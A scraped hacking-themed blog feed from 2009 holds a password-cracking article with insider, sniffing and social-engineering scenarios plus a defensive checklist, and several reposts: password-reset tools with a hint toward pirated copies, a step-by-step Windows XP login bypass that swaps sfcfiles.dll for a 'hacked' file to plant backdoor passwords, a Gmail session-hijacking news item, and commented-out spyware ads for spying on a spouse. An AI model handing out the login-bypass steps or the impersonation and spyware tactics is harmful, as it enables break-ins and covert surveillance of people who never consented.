16px;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td valign="middle"><br /></td><td align="right" valign="top"><br /></td></tr></tbody></table></td></tr></tbody></table><br /><p><a name="h1"><span class="atitle">Internal attacks</span></a></p><p> Internal attackers are the most common sources of cracking attacks because attackers have direct access to an organization's systems. The first scenario looks at a situation in which a disgruntled employee is the attacker. The attacker, a veteran systems administrator, has a problem with her job and takes it out on the systems she is trusted to administer, manage, and protect. </p><p><a name="h2"><span class="smalltitle">Example: The disgruntled employee</span></a></p><p> Jane Smith, a veteran system administrator with impeccable technical credentials, has been hired by your company to run the backup tapes during the late evenings. Your company, an ISP, has a very large data center with roughly 4000+ systems all monitored by a Network Operations Center. Jane works with two other technicians to monitor the overnight backups and rotate the tapes before the morning shift comes in. They all work independently of each other: one technician works on the UNIX Servers, one technician covers the Novell Servers, and Jane has been hired to work on the Windows 2000 Servers. </p><p>Jane has been working on the job for six months now and is a rising star. She comes in early, stays late and has asked to transfer to another department within the company. One problem: there are no open positions at the time. During the last month you (security analyst) have noticed a dramatic increase in the number of attempts at Cisco router and UNIX Server logins. You have CiscoSecure ACS implemented so you can audit the attempts and you see that most of them occur at 3 a.m.</p><p>Your suspicions are aroused, but as a security analyst, you can't go around pointing fingers without proof.</p><p>A good security analyst starts by looking deeper into the situation. You note that the attacks are from someone of high caliber and occur during Jane's shift, right after she is done with her tape rotation assignment and usually has an extra hour to study or read before the day operations team comes in. So you decide to have Jane supervised at night by the night operations manager. After three weeks of heavy supervision, you notice that the attacks have stopped. You were right. Jane was attempting to log into the Cisco routers and UNIX servers.</p><p>A good security analyst also needs to employ a good auditing tool, such as Tacacs+, to log attacks. Tacacs+ is a protocol used by applications such as CiscoSecure ACS that will force Authorization, Accountability, and Authentication (AAA for short). If you have Authorization, then the person requesting access needs to be authorized to access the system. If you have Authentication, then the user accessing a resource needs to be authenticated with rights and permissions to have access. What happens when you are authorized and also authenticated? You must be held Accountable. Accounting logs alone solve many password cracking problems by forcing an attacker to be held accountable, authenticated and authorized.</p><p>Next, I'll give an example of an old (but still widely used) attack, which involves <i>sniffing</i> passwords right off the network. You can see how a network supervisor had his Cisco routers and switches cracked by a help desk technician within the company.</p><p><a name="h2"><span class="smalltitle">Example: The help desk technician</span></a></p><p> Tommy is hired for the position of help desk technician to work with the after hours help desk crew. The after hours help desk staff is made up of roughly 10 technicians who provide coverage for eight remote sites that the company needs to support during off hours. Tommy always brings his laptop with him to work. When questioned about the laptop by his manager, Tommy explains that he is using his break time to prepare for a certification test. This seems harmless and is approved, even though there is a company-wide security policy in place about bringing machines from the outside into the corporate network without corporate security looking the device over.</p><p>Tommy is eventually caught by a surveillance camera leaving a small wiring closet with something under his arm. But since nothing is reported missing, there is no way to prove that Tommy has done anything wrong. And when questioned by the help desk manager about why he was in the closet, Tommy says that he mistakenly entered it thinking it was a break room.</p><p>The company's security manager, Erika, sees the report filed by the guards responsible for the physical security of the building. She wonders what Tommy was doing in that closet and is not satisfied with the answer he gave to the help desk manager. Upon searching the closet, she finds an unplugged patch cable hanging from one of the patch panels and an empty hub port. When she plugs the cable back in, the link light does not come back on suggesting that this is a dead port. Cable management Velcro straps neatly hold all the other cables together. With Erika's years of experience and keen sense of security exploitation, she knows exactly what happened.</p><p>Erika assumes that Tommy has brought his laptop in the wiring closet unseen. He most likely looked for a dead port on the hub and plugged his laptop in with a packet sniffer installed on it, which promiscuously picks up traffic on a network segment. He returns later to pick up the laptop, which is caught on the surveillance camera, to take home for analysis after saving the capture file.</p><p>Using the company's security policy, she confronts Tommy and explains that all personal property, such as laptops and palm pilots, are subject to search if on the premises illegally. Since Tommy never should have had his laptop there in the first place, he hands it over to Erika. Upon careful examination, Erika finds the following trace decode as seen in Figure 1.</p><br /><a name="figure1"><b>Figure 1. Captured telnet traffic with a protocol analyzer</b></a><br /><img alt="Figure 1. Captured telnet traffic with a protocol analyzer" src="http://www.ibm.com/developerworks/library/s-crack/protocolanalyzer.gif" width="600" height="110" /><br /><p>A close examination of the Hex pane of the Sniffer Pro analyzer in Figure 2 reveals ASCII data in clear view on the right side of the pane. While attached to a switch in the closet, Tommy ran the configuration while connected via a telnet session. Since the telnet protocol is unsecure and sent via cleartext, it is easy to see the password: "cisco."</p><br /><a name="figure2"><b>Figure 2. ASCII decode of plaintext data </b></a><br /><img alt="plaintext data" src="http://www.ibm.com/developerworks/library/s-crack/plaintextdata.gif" width="600" height="148" /><br /><p>This is one of the most basic principles of security: Never use a product name as a password. But in spite of how basic a principle it is, it's remarkable how often it is still done.</p><p>Next, turn your attention to some external threats.</p><br /><table border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td><img src="http://www.ibm.com/i/v14/rules/blue_rule.gif" alt="" width="100%" height="1" /></td></tr></tbody></table><table class="no-print" align="right" cellpadding="0" cellspacing="0"><tbody><tr align="right"><td><table border="0" cellpadding="0" cellspacing="0"><tbody><tr><td valign="middle"><img src="http://www.ibm.com/i/v14/icons/u_bold.gif" alt="" border="0" width="16" height="16" /><br /></td><td align="right" valign="top"><a href="http://www.ibm.com/developerworks/library/s-crack/index.html#main" class="fbox"><b></b></a><br /></td></tr></tbody></table></td></tr></tbody></table><br /><p><a name="h1"><span class="atitle">External attacks</span></a></p><p> External attackers are those who must traverse your "defense in depth" to try and break into your systems. They don't have it as easy as internal attackers. The first scenario involves a fairly common form of external attack known as Web site defacing. This attack uses password cracking to penetrate the systems that the attacker wants to deface. Another possible password cracking attack is when an attacker tries to obtain passwords via Social Engineering. Social Engineering is the tricking of an unsuspecting administrator into giving the account ID and passwords over to an attacker. Lets take a look at both. </p><p><a name="h2"><span class="smalltitle">Example: Web site home page defacing</span></a></p><p> Figure 3 demonstrates a fairly common and simple example of external password cracking: defacing a Web site's home page. It takes little effort and is usually accomplished by simply exploiting an Internet Information Server (IIS) that has its permissions set incorrectly. The attacker simply goes to a workstation and tries to attack the IIS server with an HTML editing tool. When trying to attach over the Internet to the site, the attacker uses a password generator tool, such as L0phtCrack, which launches a brute force attack against the server.</p><br /><a name="figure3"><b>Figure 3. Home page replaced by an attacker </b></a><br /><img alt="Figure 3. Home page replaced by an attacker" src="http://www.ibm.com/developerworks/library/s-crack/homepagedefaced.jpg" width="600" height="345" /><br /><p>Your company's reputation is on the line. Business vendors and associates will lose faith in you if they perceive that your data is kept on unsecured servers. Make sure you look at inside and outside threats equally.</p><p><a name="h2"><span class="smalltitle">Example: Social engineering tricks</span></a></p><p> Non-tool related tricks to crack passwords are called social engineering attacks. Read this a scenario to learn more.</p><p>Jon is the new security analyst for a large company. His first job is to test his company's security stance. He of course lets management know what he is about to do (so he doesn't get labeled as an attacker himself). He wants to see how hard it is to crack into the network without even touching a single tool. He tries two separate but equally devastating attacks.</p><p>As a new employee in a large organization, John isn't known to many people yet, which makes it easy for him to pull off his first social engineering attack. His first target is the help desk. Jon makes a routine call to the help desk and asks for a password reset as a supposed remote user. Jon already has half the information he needs since he knows that the company's naming convention is simply first name and the first initial of the user's last name. The CIO's name is Jeff and his last name is Ronald, so <code>JeffR</code> is his login ID. This information is readily available from the company's phone directory. Masquerading as the CIO, Jon calls the help desk and asks for a password reset because he has forgotten his password. This is a normal ritual for the help desk technician who resets forgotten passwords 100 times a day and calls the requestor back letting them know what their knew password is. The help desk technician calls Jon back five minutes later and lets him know that his new password is "friday" because it happens to be Friday. Within another 5 minutes, Jon is in the CIO's shared files on the server and in his e-mail.</p><p>Jon's next social engineering attack involves a good friend of his who works for the local telephone company. Jon borrows some of his gear and his belt and badge on his friend's day off. Jon takes his new gear and heads to another part of the organizations campus where all the disaster recovery routers and servers are located. This hardware contains a working copy of all the company's current data and is considered confidential. Jon walks into the campus security office in his Telco costume and explains that he has been called out by the Local Exchange Carrier (LEC) because a circuit appears to be looped from the Telco. He needs to be let into the data center so he can check out if there are any alarms on the Smart Jack.</p><p>The onsite administrator escorts Jon to the data center not even checking his ID. Once inside, the administrator wisely sticks around, so Jon starts his test. After a few minutes, Jon informs the administrator that he will have to call his office and have them run some more tests so he can loop off the Smart Jack and try to troubleshoot. Jon lets the administrator know that this will take about 45 minutes, so the administrator gives Jon his pager number and asks that he page him when he is done to let him out. Jon has now successfully eliminated the only obstacle between him and the 30 servers all lined up in racks along the back wall of the data center.</p><p>Jon has a few different opportunities now. He can go to every server and start looking for unlocked consoles, or he can plug his laptop into an open port and start sniffing. Since he really wants to see how far he can go, he decides to look for open consoles. After five minutes of looking through all the KVM slots, he finds a Windows NT server running as the Backup Domain Controller for the Domain. Jon pulls a CD out of his bag and enters it into the CD tray of the server. He installs L0phtCrack onto a BDC for the companies Domain and runs a dictionary attack. Within five minutes produces the following password: Yankees. It turns out the lead administrator is a New York Yankees fan. He now has access to the company's most vital information.</p><p>Now look at how this was done.</p><br /><a name="figure4"><b>Figure 4. Using L0phtCrack to break the Administrator password</b></a><br /><img alt="Figure 4. Using L0phtCrack to break the Administrator password" src="http://www.ibm.com/developerworks/library/s-crack/L0phtCracktool.gif" width="600" height="411" /><br /><br /><table border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td><img src="http://www.ibm.com/i/v14/rules/blue_rule.gif" alt="" width="100%" height="1" /></td></tr></tbody></table><table class="no-print" align="right" cellpadding="0" cellspacing="0"><tbody><tr align="right"><td><table style="width: 16px; height: 27px;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td valign="middle"><br /></td><td align="right" valign="top"><a href="http://www.ibm.com/developerworks/library/s-crack/index.html#main" class="fbox"><b></b></a><br /></td></tr></tbody></table></td></tr></tbody></table><br /><p><a name="h1"><span class="atitle">A protection check list</span></a></p><p> Here is a checklist of things you can do to make password cracking more difficult:</p><ul><li>Audit your organization! Do a walk through and make sure passwords are not stuck to monitors or under keyboards.</li><li>Set up dummy accounts. Get rid of the administrator (or admin) account or set it up as a trap and audit it for attempts.</li><li>Use strong, difficult to guess passwords, and never leave a console unlocked.</li><li>Backups are necessary in case you are compromised. You need a working set of data, so make sure you have it. Keep the tapes secure too, or the data there will be compromised as well. </li><li>Prevent dumpster diving. Don't throw sensitive information away; shred it or lock it up.</li><li>Check IDs and question people you don't know. When you have visitors, check them out and make sure they belong.</li><li>Educate your end users. Make sure they aren't prone to social engineering and educate and remind internal users of the company's security policies.</li></ul><br /><table border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td><img src="http://www.ibm.com/i/v14/rules/blue_rule.gif" alt="" width="100%" height="1" /></td></tr></tbody></table><table class="no-print" align="right" cellpadding="0" cellspacing="0"><tbody><tr align="right"><td><table border="0" cellpadding="0" cellspacing="0"><tbody><tr><td valign="middle"><img src="http://www.ibm.com/i/v14/icons/u_bold.gif" alt="" border="0" width="16" height="16" /><br /></td><td align="right" valign="top"><a href="http://www.ibm.com/developerworks/library/s-crack/index.html#main" class="fbox"><b></b></a><br /></td></tr></tbody></table></td></tr></tbody></table><br /><br /><p><a name="h1"><span class="atitle">Summary</span></a></p><p> In this article I've described some of the psychology behind an attacker's motivation and some of the low-tech and high-tech methods used to crack passwords. You've looked at several attack scenarios, including attacks against major companies by a veteran administrator, a help desk technician, and an outside vandal. You also saw how password crackers use techniques both internally and externally to your infrastructure. Finally, some ideas on how to properly secure yourself and your systems from the possibility of a password cracking attack were offered. Combating these attacks ultimately requires a conscious effort, trained individuals, useful tools, and sound security policies. Hopefully, as a proactive security analyst, you can make a difference in helping to slow down this malicious activity within your organizations as well as outside of them. Otherwise, you may find Jon in your server room with a smirk on his face and your data in his hands.</p>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-1513589757074850272009-07-28T07:05:00.001-07:002009-07-28T07:05:54.139-07:00Setting Windows XP User Account with Random PasswordThere are many <a id="KonaLink0" target="undefined" class="kLink" style="text-decoration: underline ! important; position: static;" href="http://www.raymond.cc/blog/archives/2006/12/15/setting-windows-xp-user-account-with-random-password/#"><span style="color: blue ! important; font-family: verdana,arial,sans-serif; font-weight: 400; font-size: 11px; position: static;color:blue;" ><span class="kLink" style="color: blue ! important; font-family: verdana,arial,sans-serif; font-weight: 400; font-size: 11px; position: static;">freewares</span></span></a> thats capable of generating random passwords for you if you couldn’t think and decide what password to use for your internet banking, emails, user account and etc… It’s not that hard to program something like that, that’s why most of random password generators are offered free. A good password will have numbers, letters, and special characters with at least 8 characters. Now you don’t have to download and install any random <a id="KonaLink2" target="undefined" class="kLink" style="text-decoration: underline ! important; position: static;" href="http://www.raymond.cc/blog/archives/2006/12/15/setting-windows-xp-user-account-with-random-password/#"><span style="color: blue ! important; font-family: verdana,arial,sans-serif; font-weight: 400; font-size: 11px; position: static;color:blue;" ><span class="kLink" style="color: blue ! important; font-family: verdana,arial,sans-serif; font-weight: 400; font-size: 11px; position: static;">password </span><span class="kLink" style="color: blue ! important; font-family: verdana,arial,sans-serif; font-weight: 400; font-size: 11px; position: static;">generators</span></span></a> even though it’s free because Windows already has one built-in! And it’s capable of setting the random generated password as your <a id="KonaLink3" target="undefined" class="kLink" style="text-decoration: underline ! important; position: static;" href="http://www.raymond.cc/blog/archives/2006/12/15/setting-windows-xp-user-account-with-random-password/#"><span style="color: blue ! important; font-family: verdana,arial,sans-serif; font-weight: 400; font-size: 11px; position: static;color:blue;" ><span class="kLink" style="color: blue ! important; font-family: verdana,arial,sans-serif; font-weight: 400; font-size: 11px; position: static;">Windows </span><span class="kLink" style="color: blue ! important; font-family: verdana,arial,sans-serif; font-weight: 400; font-size: 11px; position: static;">user</span></span></a> account’s password.<br /><br />Run <a id="KonaLink4" target="undefined" class="kLink" style="text-decoration: underline ! important; position: static;" href="http://www.raymond.cc/blog/archives/2006/12/15/setting-windows-xp-user-account-with-random-password/#"><span style="color: blue ! important; font-family: verdana,arial,sans-serif; font-weight: 400; font-size: 11px; position: static;color:blue;" ><span class="kLink" style="border-bottom: 1px solid blue; color: blue ! important; font-family: verdana,arial,sans-serif; font-weight: 400; font-size: 11px; position: static; background-color: transparent;">command </span><span class="kLink" style="border-bottom: 1px solid blue; color: blue ! important; font-family: verdana,arial,sans-serif; font-weight: 400; font-size: 11px; position: static; background-color: transparent;">prompt</span></span><span style="position: relative;" id="preLoadWrap4"><div style="position: absolute; z-index: 4000; top: -32px; left: -18px; display: none;" id="preLoadLayer4"><img style="border: 0px none ;" src="http://kona.kontera.com/javascript/lib/imgs/grey_loader.gif" /></div></span></a> by clicking on Start, then run..<br /><img src="http://www.raymond.cc/images/startrunrandom.gif" alt="Windows Start Run" /><br />and type the word ‘<strong>CMD</strong>‘. Click OK<br /><img src="http://www.raymond.cc/images/runcmdrandom.gif" alt="Windows Command Prompt" /> <p>On the command line you can type:<br /><span style="font-size: 16px;"><strong>net user [username] /random</strong></span> (an example below)<br /><img src="http://www.raymond.cc/images/xprandompass.gif" alt="Generate Random Password from Windows" /></p> Now the password for the user “<strong>administrator</strong>” is “<strong>NP3pnbZ8</strong>“. This method only works for LOCAL account. One important note, be very careful with random password because you won’t remember it unless you memorize it or write it somewhere otherwise you won’t be able to login to Windows. If you’ve forgotten the random password, read this article on <a href="http://www.raymond.cc/blog/archives/2006/09/02/how-to-hack-into-a-windows-xp-computer-without-changing-password/">how to hack into Windows without knowing the password</a>.Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-37219836195306437722009-07-28T07:04:00.001-07:002009-07-28T07:04:33.111-07:00Reset and Edit Windows Local Administrator and User PasswordTwo of the best ways to login to Windows if you’ve forgotten the password is by reseting the password or replacing sfcfiles.dll with a cracked one to allow login with any password. However, a lot of anti-virus detects the cracked sfcfiles.dll as a hacktool and it prevents the DLL file from loading making it unusable.<br /><br />The best and highly successful way to login to Windows if you’ve forgotten the password is by resetting the password. All you need to do is put in a BootCD, boot up with it and follow the simple instructions to reset any user’s password. No bruteforce cracking, modifying of cracked DLL files….<br /><br />Today I found a software that’s better and more powerful than Windows Key included in Passware Kit Enterprise.<br /><br /><strong>Active@ Password Changer</strong> is designed for resetting local administrator and user passwords on <a id="KonaLink0" target="undefined" class="kLink" style="text-decoration: underline ! important; position: static;" href="http://www.raymond.cc/blog/archives/2007/06/03/reset-and-edit-windows-local-administrator-and-user-password/#"><span style="color: blue ! important; font-family: verdana,arial,sans-serif; font-weight: 400; font-size: 11px; position: static;color:blue;" ><span class="kLink" style="color: blue ! important; font-family: verdana,arial,sans-serif; font-weight: 400; font-size: 11px; position: static;">Windows </span><span class="kLink" style="color: blue ! important; font-family: verdana,arial,sans-serif; font-weight: 400; font-size: 11px; position: static;">XP</span></span></a> / VISTA / 2003 / 2000 / NT <a id="KonaLink1" target="undefined" class="kLink" style="text-decoration: underline ! important; position: static;" href="http://www.raymond.cc/blog/archives/2007/06/03/reset-and-edit-windows-local-administrator-and-user-password/#"><span style="color: blue ! important; font-family: verdana,arial,sans-serif; font-weight: 400; font-size: 11px; position: static;color:blue;" ><span class="kLink" style="color: blue ! important; font-family: verdana,arial,sans-serif; font-weight: 400; font-size: 11px; position: static;">systems</span></span></a> in case an Administrator’s password is forgotten or lost. You do not need to re-install and re-configure the operating system.<br /><img src="http://www.raymond.cc/images/apc-main-screen.png" alt="Active_Password.Changer.Pro.v3.5.build.0067" /> <p>Forgotten <a id="KonaLink3" target="undefined" class="kLink" style="text-decoration: underline ! important; position: static;" href="http://www.raymond.cc/blog/archives/2007/06/03/reset-and-edit-windows-local-administrator-and-user-password/#"><span style="color: blue ! important; font-family: verdana,arial,sans-serif; font-weight: 400; font-size: 11px; position: static;color:blue;" ><span class="kLink" style="color: blue ! important; font-family: verdana,arial,sans-serif; font-weight: 400; font-size: 11px; position: static;">password </span><span class="kLink" style="color: blue ! important; font-family: verdana,arial,sans-serif; font-weight: 400; font-size: 11px; position: static;">recovery</span></span></a> software has a simple user interface, supports multiple hard disk drives, detects several SAM databases (if multiple OS were installed on one volume) and provides the opportunity to pick the right SAM before starting the password recovery process. It displays a list of all local users. The software user simply chooses the local user from the list to reset the password.</p> <p>This is the part which makes Active@ Password Changer better than Windows Key. Other Windows login security restrictions like ‘<strong>Account is disabled</strong>‘, ‘<strong>Password never expires</strong>‘, ‘<strong>Account is locked out</strong>‘, ‘<strong>User Must Change Password at Next Logon</strong>‘ and ‘<strong>Logon Hours</strong>‘ can be changed or reset.<br /><img style="visibility: visible; opacity: 0.99999; cursor: pointer;" id="img456633933" onclick="enlargerScaleImg('img456633933', 400, 0)" onload="enlargerScaleImg('img456633933', 400, 1)" src="http://www.raymond.cc/images/active-password-changer.png" alt="Reset Administrator Password" width="400" /><noscript><img id="400" src="http://www.raymond.cc/images/active-password-changer.png" alt="Reset Administrator Password" /></noscript><br />You’ll be surprised that this feature is included in the DOS version!<br /><img style="visibility: visible; opacity: 0.99999; cursor: pointer;" id="img2113361227" onclick="enlargerScaleImg('img2113361227', 400, 0)" onload="enlargerScaleImg('img2113361227', 400, 1)" src="http://www.raymond.cc/images/active-password-dos.gif" alt="Hack Administrator Password" width="400" /><noscript><img id="400" src="http://www.raymond.cc/images/active-password-dos.gif" alt="Hack Administrator Password" /></noscript></p> <p>Windows Key only works in DOS but Active@ Password Changer has program for Windows and DOS. Surprisingly, Active@ Password Changer only cost USD59.99 while Windows Key cost US195.00 for the Professional version and USD295.00 for the enterprise version. Obviously you’ll purchase Active@ Password Changer if given a choice as it’s cheaper and better.</p> <p>Free Demo version allows you to detect the correct Windows SAM <a id="KonaLink4" target="undefined" class="kLink" style="text-decoration: underline ! important; position: static;" href="http://www.raymond.cc/blog/archives/2007/06/03/reset-and-edit-windows-local-administrator-and-user-password/#"><span style="color: blue ! important; font-family: verdana,arial,sans-serif; font-weight: 400; font-size: 11px; position: static;color:blue;" ><span class="kLink" style="color: blue ! important; font-family: verdana,arial,sans-serif; font-weight: 400; font-size: 11px; position: static;">database</span></span></a>, view the user list and specific user attributes. Professional version allows the user to actually reset passwords and attributes.</p> <p>P/S: The retail version of Active@ Password Changer Pro v3.5 build 0067 has already been leaked out. But very sorry, I am unable to provide the links. Please do <strong>NOT</strong> ask or request for it here. Use your friendly Google <img src="http://www.raymond.cc/blog/wp-includes/images/smilies/icon_wink.gif" alt=";)" class="wp-smiley" /> </p> <strong>[ <a href="http://www.password-changer.com/download.htm">Download Active@ Password Changer Demo</a> ]</strong>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-12942861493920700062009-07-28T06:57:00.000-07:002009-07-28T07:00:07.290-07:00How to Hack Into a Windows XP Computer Without Changing PasswordA method to login to a password protected Windows even if you do not have the password is by making Windows accepting any passwords.<br />There is a far better way to get into Windows XP. It is easy and it does not reset the password. Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). You do not need access to any accounts to do this. Of course, do not do this on anyone elses computer without proper authorisation.<br /><img src="http://www.raymond.cc/images/wxplgn06.gif" alt="Bypass Windows Login screen" /> <p><strong>Steps to Hack into a Windows XP Computer without changing password:</strong><br /><span id="more-339"></span><script language="JavaScript1.1" src="http://bdv.bidvertiser.com/BidVertiser.dbm?pid=82885&bid=227087" type="text/javascript"></script><iframe name="BidVertiser_Frame" src="http://bdv.bidvertiser.com/bidvertiser.dbm?pid=82885&bid=227087&RD=73&DIF=1&bd_ref_v=http%3A//www.raymond.cc/blog/archives/2006/09/02/how-to-hack-into-a-windows-xp-computer-without-changing-password/&tref=1&win_name=null&docref=http://www.google.co.in/search?hl=en&client=firefox-a&channel=s&rls=org.mozilla:en-US:official&q=computer+hacking+passwords&revid=1205186158&ei=7gNvSvTYOYuG6AOaodW1BA&sa=X&oi=revisions_inline&resnum=0&ct=broad-revision&cd=5&jsrand=906156&js1loc=http%3A//www.raymond.cc/blog/archives/2006/09/02/how-to-hack-into-a-windows-xp-computer-without-changing-password/" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" style="opacity: 1;" scrolling="no" width="234" frameborder="0" height="60"></iframe><br />1. Get physical access to the machine. Remember that it must have a CD or DVD drive.<br />2. <a href="http://rapidshare.com/files/92000816/dpl.zip">Download DreamPackPL HERE</a>.<br />3. Unzip the downloaded dpl.zip and you’ll get dpl.ISO.<br />4. Use any burning program that can burn ISO images.<br />5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.<br />6. Press “<strong>R</strong>” to install DreamPackPL.<br />7. Press “<strong>C</strong>” to install DreamPackPL by using the recovery console.<br />8. Select the Windows installation that is currently on the computer (Normally is “1″ if you only have one Windows installed)<br />9. Backup your original sfcfiles.dll by typing:<br />“<strong>ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld</strong>” (without quotes)<br />10. Copy the hacked file from CD to system32 folder. Type:<br />“<strong>copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll</strong>” (without quotes and assuming your CD drive is D:)<br />11. Type “exit”, take out disk and reboot.<br />12. In the password field, type “<strong>dreamon</strong>” (without quotes) and DreamPack menu will appear.<br />13. Click the top graphic on the DreamPack menu and you will get a menu popup.<br /><img src="http://www.raymond.cc/images/dreamon.gif" alt="Hack Windows Login Dreamon" /><br />14. Go to commands and enable the options and enable the god command.<br /><img src="http://www.raymond.cc/images/dppl06.gif" alt="Bypass and hack user account passwords" /><br />15. Type “god” in the password field to get in Windows.</p> <p>You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.</p> <strong>Note:</strong> I was unable to bring up the DreamPackPL for the first time because I have Kaspersky Anti-Virus already running in background. I believe most antivirus already labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. DreamPackPL helps you bypass the Windows Login screen and it is not destructive.Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-86819828256131010472009-07-28T06:08:00.000-07:002009-07-28T06:09:09.628-07:00Gmail Account Hacking Tool<p>A tool that automatically steals IDs of non-encrypted sessions and breaks into Google Mail accounts has been presented at the Defcon hackers’ conference in Las Vegas.</p> <p>Last week Google introduced a new feature in Gmail that allows users to permanently switch on SSL and use it for every action involving Gmail, and not only, authentication. Users who did not turn it on now have a serious reason to do so as Mike Perry, the reverse engineer from San Francisco who developed the tool is planning to release it in two weeks.</p> <p>When you log in to Gmail the website sends a cookie (a text file) containing your session ID to the browser. This file makes it possible for the website to know that you are authenticated and keep you logged in for two weeks, unless you manually hit the sign out button. When you hit sign out this cookie is cleared.</p> <p>Even though when you log in, Gmail forces the authentication over SSL (Secure Socket Layer), you are not secure because it reverts back to a regular unencrypted connection after the authentication is done. According to Google this behavior was chosen because of low-bandwidth users, as SLL connections are slower.</p> <p>The problem lies with the fact that every time you access anything on Gmail, even an image, your browser also sends your cookie to the website. This makes it possible for an attacker sniffing traffic on the network to insert an image served from http://mail.google.com and force your browser to send the cookie file, thus getting your session ID. Once this happens the attacker can log in to the account without the need of a password. People checking their e-mail from public wireless hotspots are obviously more likely to get attacked than the ones using secure wired networks. <span style="color: rgb(0, 0, 0);">Todd Mumford, from the <a title="SEO Visions" href="http://www.seovisions.com/" target="_blank">SEO company</a> called <a title="SEO Visions" href="http://www.seovisions.com/internet-marketing.html" target="_blank">SEO Visions Inc</a>, states “This can be a serious problem for Internet Marketers who travel often and use their wireless laptops and Gmal services often and do not always have access to a secure connection”</span></p> <p><span style="color: rgb(0, 0, 0);">Per</span>ry mentioned that he notified Google about this situation over a year ago and even though eventually it made this option available, he is not happy with the lack of information. “Google did not explain why using this new feature was so important” he said. He continued and explained the implications of not informing the users, “This gives people who routinely log in to Gmail beginning with an https:// session a false sense of security, because they think they’re secure but they’re really not.”</p> <p>If you are logging in to your Gmail account from different locations and you would like to benefit from this option only when you are using unsecured networks, you can force it by manually typing https://mail.google.com before you log in. This will access the SSL version of Gmail and it will be persistent over your entire session and not only during authentication.</p>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-21352763785922724712009-07-24T06:46:00.001-07:002009-07-24T06:46:56.528-07:00Hack BSNL Broadband for Speed<!-- Promote Posts --> <!--<div style="width:556px;height:175px;border:2px solid #ffe400;padding:5px;"> <p> <a href="http://www.gohacking.com/recom_products/sniper_spy.php" target="_blank" rel="nofollow" style="color:B50000;font-size:16px" onmouseover="return showStatus('');" onmouseout="return showStatus('');"><u>Is your Spouse Cheating? Catch a Cheating Spouse Red-Handed!</u></a><br /><span style="font-size:16px;color:#000000;">Access Any PC from Anywhere. Spy on Any Email to Find Out the Truth! Award Winning Remote PC Surveillance Software.</span><br /><a href="http://www.gohacking.com/products/hacking-security-books" target="_blank" rel="nofollow" style="color:B50000;font-size:16px" onmouseover="return showStatus('');" onmouseout="return showStatus('');"><u>Want to Learn Hacking? ...But Don't Know Where to Start?</u></a><br /><span style="font-size:16px;color:#000000;">Learn Underground Hacker Techniques <b>from the Basics</b>. Become One with the Hackers. Start Your Journey Today! </span></p> </div><br />--> <!-- End Promote Posts --> <!-- Begin BidVertiser code --> <!--<script language="JavaScript1.1" src="http://bdv.bidvertiser.com/BidVertiser.dbm?pid=98267&bid=384485" type="text/javascript"><br /></script> <noscript><a href="http://www.bidvertiser.com">internet advertising</a></noscript>--> <!-- End BidVertiser code --> <p><a href="http://www.gohacking.com/wp-content/uploads/2008/12/broadband.jpg"><img class="alignleft size-thumbnail wp-image-341" title="broadband" src="http://www.gohacking.com/wp-content/uploads/2008/12/broadband-150x150.jpg" alt="" width="150" height="150" /></a></p> <p>If you are a BSNL broadband user, chances are that you are facing frequent DNS issues. Their DNS servers are just unresponsive. The look up takes a long duration and many times just time out. The solution? There is small hack on BSNL for this. Use third party DNS servers instead of BSNL DNS servers or run your own one like <a class="external" title="DJBDNS" rel="nofollow" href="http://cr.yp.to/djbdns.html" target="_blank"><strong><span style="color: rgb(0, 85, 0);">djbdns</span></strong></a>. The easiest options is to use <a class="external" title="OpenDNS" rel="nofollow" href="http://www.opendns.com/" target="_blank"><strong><span style="color: rgb(0, 85, 0);">OpenDNS</span></strong></a>. Just reconfigure your network to use the following DNS servers:</p> <p>208.67.222.222<br />208.67.220.220</p> <p>Detailed instructions specific to operating system or your BSNL modem are available in the OpenDNS website itself. After I reconfigured my BSNL modem to use the above 2 IP addresses, my DNS problems just vanished! Other ‘freebies’ that come with OpenDNS are phishing filters and automatic URL correction. Even if your service provider’s DNS servers are working fine, you can still use OpenDNS just for these two special features.After you hack BSNL DNS servers, you will see a noticeable improvement in your broadband speed.</p>Praba.... a Hacker......http://www.blogger.com/profile/17884637785245594852noreply@blogger.com0tag:blogger.com,1999:blog-531974719972011792.post-1599553360705464132009-07-24T06:45:00.001-07:002009-07-24T06:45:27.432-07:00How to Monitor a Local or Remote Computer<!-- Promote Posts --> <!--<div style="width:556px;height:175px;border:2px solid #ffe400;padding:5px;"> <p> <a href="http://www.gohacking.com/recom_products/sniper_spy.php" target="_blank" rel="nofollow" style="color:B50000;font-size:16px" onmouseover="return showStatus('');" onmouseout="return showStatus('');"><u>Is your Spouse Cheating? Catch a Cheating Spouse Red-Handed!</u></a><br /><span style="font-size:16px;color:#000000;">Access Any PC from Anywhere. Spy on Any Email to Find Out the Truth! Award Winning Remote PC Surveillance Software.</span><br /><a href="http://www.gohacking.com/products/hacking-security-books" target="_blank" rel="nofollow" style="color:B50000;font-size:16px" onmouseover="return showStatus('');" onmouseout="return showStatus('');"><u>Want to Learn Hacking? ...But Don't Know Where to Start?</u></a><br /><span style="font-size:16px;color:#000000;">Learn Underground Hacker Techniques <b>from the Basics</b>. Become One with the Hackers. Start Your Journey Today! </span></p> </div><br />--> <!-- End Promote Posts --> <!-- Begin BidVertiser code --> <!--<script language="JavaScript1.1" 